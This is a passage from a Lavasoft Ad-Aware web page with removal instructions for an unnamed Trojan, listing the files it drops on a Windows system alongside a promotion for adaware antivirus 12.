  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\kss.ini (160 bytes)
    C:\woniu.dll (61 bytes)
    C:\systemvc.dll (47 bytes)
    C:\yundamaAPI.dll (392 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\io[1].htm (15313 bytes)
    C:\dc.dll (122 bytes)
    C:\CrackCaptchaAPI.dll (1 bytes)
    C:\MiMidama.dll (223 bytes)
    C:\MayiAPI.dll (1 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now